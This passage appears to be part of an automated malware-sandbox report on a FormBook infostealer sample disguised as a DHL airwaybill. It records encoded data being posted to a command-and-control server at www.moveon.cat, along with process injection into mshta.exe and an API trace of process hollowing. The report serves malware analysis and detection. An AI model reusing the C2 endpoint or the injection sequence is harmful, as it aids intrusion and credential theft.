              X-Powered-By: PHP/8.2.23
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <http://moveon.cat/wp-json/>; rel="https://api.w.org/"
              Content-Encoding: gzip


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              50 | 192.168.2.6 | 49779 | 217.160.0.193 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:08:22.919388056 CEST | 809 | OUT | POST /bb55/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.moveon.cat
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.moveon.cat
              Referer: http://www.moveon.cat/bb55/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=nfb0GOOUJQD8dLGXviYV12hQ0FTwBjO8xpKtTeLa+DS4X1mXd5qEKQrjznL3t/O9l+etBDK+y1/uV6NdPgOzS7euHqOdB6ammE5mvopK7obQ9g+LnoQGv8nkEXzFqEy9fwvj/ntI/Zq9hsLiX53zvrJhKk55/WR1wTD/j6gZg1ptr0FG3o9n4fZdyDAbl6mZ3fs0or/Oy4ooSM9lrOmItviUHTv6NJRf3g==
              Sep 6, 2024 09:08:23.701781034 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Date: Fri, 06 Sep 2024 07:08:23 GMT
              Server: Apache
              X-Powered-By: PHP/8.2.23
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <http://moveon.cat/wp-json/>; rel="https://api.w.org/"
              Content-Encoding: gzip


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              51 | 192.168.2.6 | 49780 | 217.160.0.193 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:08:25.548528910 CEST | 1822 | OUT | POST /bb55/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.moveon.cat
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.moveon.cat
              Referer: http://www.moveon.cat/bb55/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:08:26.330564022 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Date: Fri, 06 Sep 2024 07:08:26 GMT
              Server: Apache
              X-Powered-By: PHP/8.2.23
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <http://moveon.cat/wp-json/>; rel="https://api.w.org/"
              Content-Encoding: gzip


              Session ID | Source IP | Source Port | Destination IP | Destination Port
              52 | 192.168.2.6 | 49782 | 217.160.0.193 | 80
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:08:29.383398056 CEST | 528 | OUT | GET /bb55/?FR=qdzUF+C4KgbVJvWmmn8R5hRL/2fqEFiYhougQvjggmODZzWjY8rbJBXd+0mtuuLK6ozYWyaagBrSOvtROhupesjxef+9ZK6Rgj9rnagPgpTk5Eewhqg4wMCweUmjwTCKS2nymHQ=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.moveon.cat
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:08:30.163009882 CEST | 510 | IN | HTTP/1.1 301 Moved Permanently
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Date: Fri, 06 Sep 2024 07:08:29 GMT
              Server: Apache
              X-Powered-By: PHP/8.2.23
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              X-Redirect-By: WordPress
              Location: http://moveon.cat/bb55/?FR=qdzUF+C4KgbVJvWmmn8R5hRL/2fqEFiYhougQvjggmODZzWjY8rbJBXd+0mtuuLK6ozYWyaagBrSOvtROhupesjxef+9ZK6Rgj9rnagPgpTk5Eewhqg4wMCweUmjwTCKS2nymHQ=&yXghy=KTox
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Target ID: 0
              Start time: 03:04:19
              Start date: 06/09/2024
              Path: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe
              Wow64 process (32bit): true
              Commandline: "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe"
              Imagebase: 0x2c0000
              File size: 776'704 bytes
              MD5 hash: 7E3FEACBDE086188081C1FA2C0891090
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Reputation: low
              Has exited: true

              Target ID: 3
              Start time: 03:04:20
              Start date: 06/09/2024
              Path: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe
              Wow64 process (32bit): true
              Commandline: "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe"
              Imagebase: 0xfc0000
              File size: 776'704 bytes
              MD5 hash: 7E3FEACBDE086188081C1FA2C0891090
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              Reputation: low
              Has exited: true

              Target ID:5
              Start time:03:04:36
              Start date:06/09/2024
              Path:C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe"
              Imagebase:0xff0000
              File size:140'800 bytes
              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:false

              Target ID:6
              Start time:03:04:38
              Start date:06/09/2024
              Path:C:\Windows\SysWOW64\mshta.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\SysWOW64\mshta.exe"
              Imagebase:0x5a0000
              File size:13'312 bytes
              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4606130866.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              Reputation:moderate
              Has exited:false

              Target ID:10
              Start time:03:05:02
              Start date:06/09/2024
              Path:C:\Program Files\Mozilla Firefox\firefox.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
              Imagebase:0x7ff728280000
              File size:676'768 bytes
              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

                Execution Graph

                Execution Coverage:9.2%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:1.6%
                Total number of Nodes:252
                Total number of Limit Nodes:16

                Control-flow Graph

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2154197406.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2790000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: $ $$$$$'$2$6$6$;$;$;$T$T$T$$q
                • API String ID: 0-3505707904
                • Opcode ID: 03ba8cc2d12f0b1399beaf84ee98a9e53ddf968053340ef70108d1cfcec93de3
                • Instruction ID: fd6a4a8da2a4ef49a0903b4432930d26dc364677ad5f2c9538fcfd169db6bc26
                • Opcode Fuzzy Hash: 03ba8cc2d12f0b1399beaf84ee98a9e53ddf968053340ef70108d1cfcec93de3
                • Instruction Fuzzy Hash: 93D25B31A10719CFCB15EF78C894B99B7B2BF8A300F1186A9D8096F355EB75A985CF40
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 20c37eddc0893af0aa82170f33a6774e42c38229756a02b370137010525b9fcb
                • Instruction ID: fe28a57e2fc1140262907c62bcac6f7aee175b7ae2a52deae5a4575bb607533c
                • Opcode Fuzzy Hash: 20c37eddc0893af0aa82170f33a6774e42c38229756a02b370137010525b9fcb
                • Instruction Fuzzy Hash: CAE15D75A00209DFDF45EBA8D854BAEBBB2FF89300F1080A5E509AB355DB39AD41CF51
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5f25a3a374a22c8598d031e5a8dd1320905e2a8c8e8fd76db8852f419cfcc90e
                • Instruction ID: eb361398acf6286c35309da4f0a718a3dd7f5499fcc437e3d6fe0019cbcef6cc
                • Opcode Fuzzy Hash: 5f25a3a374a22c8598d031e5a8dd1320905e2a8c8e8fd76db8852f419cfcc90e
                • Instruction Fuzzy Hash: 8481E4B1E446298FEB68CF66C8407E9B7F6BF89300F14D1EAD40DA6254EB745A85CF40
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1a480146a228bc1fd254f91ef37613f97274c048785da6802e96ad5ae135b493
                • Instruction ID: 0a9f9ed572c17aa709183161ab7fb86016b8dbca2e04d02891e1ab0363318161
                • Opcode Fuzzy Hash: 1a480146a228bc1fd254f91ef37613f97274c048785da6802e96ad5ae135b493
                • Instruction Fuzzy Hash: 4451F3B4E14219CFDB48CFE9C840AAEBBF6FF89300F108169D919AB354DB355A46CB50
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b02ecde9a6fb6ccf8812b288503d18a22f279146d87e0f6454059c65b84d03af
                • Instruction ID: 14dbb8223dac42b58f0483103b23f30998de8bbf8abfeadf4f491a7449b1f068
                • Opcode Fuzzy Hash: b02ecde9a6fb6ccf8812b288503d18a22f279146d87e0f6454059c65b84d03af
                • Instruction Fuzzy Hash: 4111D7B1D006588BEB58CF67D8547DEBBF6AFC8310F14C469980D66264DB3509468F90

                Control-flow Graph

                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B291AE
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: fe078f2f76b8da0636dbd7c2ba75198a98be92a9b3a64bb6ce1cc3fcd801ecd8
                • Instruction ID: 57839cce630c7d9131425db75d3c56ed8a7075d1b7cb6d6bb81f9477cd4c0277
                • Opcode Fuzzy Hash: fe078f2f76b8da0636dbd7c2ba75198a98be92a9b3a64bb6ce1cc3fcd801ecd8
                • Instruction Fuzzy Hash: B2A14AB1D0022A9FEB50DFA9C8417DEBBF2FF49300F1485A9E819A7240DB759985CF91

                Control-flow Graph

                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B291AE
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 0ab986f1e13feb3ad4568c304748b62049f3ae7f445aa94bd01059bd72dae429
                • Instruction ID: f7a1430e9403eb4fc9fb7e17a5f49f2d6026e8cfc384ff9255cfcabde19c1a2a
                • Opcode Fuzzy Hash: 0ab986f1e13feb3ad4568c304748b62049f3ae7f445aa94bd01059bd72dae429
                • Instruction Fuzzy Hash: B89149B1D0022A9FEB50DFA9C8417DEBBF2FF49300F1485A9E818A7240DB759985CF91

                Control-flow Graph

                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 00C1AF3E
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 1a66d6cb4897af05fa2c7eac4f64d71d47e99fb534d45c06165b64a85e2fffee
                • Instruction ID: 0d023a9db9bf612d33c05136a0cf2087f74ff86eff1b2edfc43119772ddb03dd
                • Opcode Fuzzy Hash: 1a66d6cb4897af05fa2c7eac4f64d71d47e99fb534d45c06165b64a85e2fffee
                • Instruction Fuzzy Hash: 93816970A01B058FDB24DF69D44179ABBF1FF89304F00892ED05ADBA51D734E98ADB92

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d7b5caff25d553136678689557b83cb644004d7a3b486577affc29dcea7c596
                • Instruction ID: 0252c367b4dac219638778354b643b269202aecc99455423db0e87deef292d73
                • Opcode Fuzzy Hash: 2d7b5caff25d553136678689557b83cb644004d7a3b486577affc29dcea7c596
                • Instruction Fuzzy Hash: 8C41CE71805B48CFDB10DFA8C4847EDBBB0EF97324F24418AC055AB255C735998AEB12

                Control-flow Graph

                APIs
                • CreateActCtxA.KERNEL32(?), ref: 00C159A9
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: e0378717bec59520c862750e1370400cbc923e50b2dc903a935f9829b440576e
                • Instruction ID: 0549330c96169583f045fd352c64f930a68efced3c14b6e20e6ecde543050bef
                • Opcode Fuzzy Hash: e0378717bec59520c862750e1370400cbc923e50b2dc903a935f9829b440576e
                • Instruction Fuzzy Hash: C0410470C00719CBEB14CFA9C8847DDBBB5BF89704F20816AD409AB251DB755945CF91

                Control-flow Graph

                APIs
                • CreateActCtxA.KERNEL32(?), ref: 00C159A9
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: c8e26da5aaf3c3b9db38a5a890117f095d25dae8a03a5402fdffa567888ce084
                • Instruction ID: 16964c51a1fdfc865214e09f7f4e1613ee61ee7084e34abb06b21d3c31a5a692
                • Opcode Fuzzy Hash: c8e26da5aaf3c3b9db38a5a890117f095d25dae8a03a5402fdffa567888ce084
                • Instruction Fuzzy Hash: 5741E3B0C0071DCBEB24DFA9C8447DEBBB5BF89704F20816AD418AB251DB756949CF91

                Control-flow Graph

                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 02794111
                Memory Dump Source
                • Source File: 00000000.00000002.2154197406.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2790000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                APIs
                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D53845,?,?), ref: 04D538F7
                Memory Dump Source
                • Source File: 00000000.00000002.2156642635.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d50000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: DrawText
                • String ID:
                • API String ID: 2175133113-0
                APIs
                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D53845,?,?), ref: 04D538F7
                Memory Dump Source
                • Source File: 00000000.00000002.2156642635.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d50000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: DrawText
                • String ID:
                • API String ID: 2175133113-0
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B28D80
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                APIs
                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D53845,?,?), ref: 04D538F7
                Memory Dump Source
                • Source File: 00000000.00000002.2156642635.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d50000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: DrawText
                • String ID:
                • API String ID: 2175133113-0
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C1D586,?,?,?,?,?), ref: 00C1D647
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B28D80
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B28E60
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C1D586,?,?,?,?,?), ref: 00C1D647
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B2879E
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B2879E
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B28E60
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C1AFB9,00000800,00000000,00000000), ref: 00C1B1CA
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B28C9E
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                APIs
                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06B2BD89,?,?), ref: 06B2BF30
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C1AFB9,00000800,00000000,00000000), ref: 00C1B1CA
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B28C9E
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                APIs
                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06B2BD89,?,?), ref: 06B2BF30
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                APIs
